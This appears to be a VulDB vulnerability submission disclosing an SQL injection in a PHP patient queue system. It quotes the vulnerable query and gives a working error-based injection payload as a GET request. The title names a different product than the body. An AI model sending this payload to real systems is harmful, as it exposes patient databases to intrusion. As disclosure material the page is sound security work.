| Kura | SourceCodester User-Management-PHP-MYSQL web v1 SQL Injection |
|---|
| Gaskiya | 1、The address of an open-source project(PQMS) with vulnerabilities:https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html
2、There is an sql injection vulnerability in the reference_number attribute on line 183 of the pqms/php/ api_patient_checkin.php file:
$res = mysqli_query($db, "SELECT a.*, s.first_name AS fname,s.last_name AS lname,
p.first_name,p.last_name,t.name AS appoint_name
FROM checkins a
INNER JOIN patients p ON p.id = a.patient_id
LEFT JOIN staff s ON s.id = a.doctor_id
LEFT JOIN appointment_types t ON t.id = a.app_type_id
WHERE a.reference_number = '$appid' ");
3、Deploy PAMS and Verify using the xpath syntax error echo mechanism of the MySQL function EXTRACTVALUE(xml_doc, xpath), and return version numbers such as XPATH syntax error: '~5.7.28~' → injection exists. Verify poc:
GET /pqms/php/api_patient_checkin.php?appointmentID=appointmentID=WALK202507056%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))--%20 HTTP/1.1
Host: x.x.x.x:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close |
|---|
| Manga | ⚠️ http://x.x.x.x:8888/pqms/php/api_patient_checkin.php?appointmentID=appointmentID=WALK202507056%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))--%20 |
|---|
| Màdùmga | 0CTL0 (UID 92069) |
|---|
| Furta | 10/28/2025 03:10 (4 Wurɗi 전) |
|---|
| Gargajiya | 11/13/2025 13:15 (16 days later) |
|---|
| Halitta | Shingilam |
|---|
| VulDB gite | 332350 [SourceCodester Patients Waiting Area Queue Management System 1.0 api_patient_checkin.php getPatientAppointment appointmentID SQL Injection] |
|---|
| Nganji | 20 |
|---|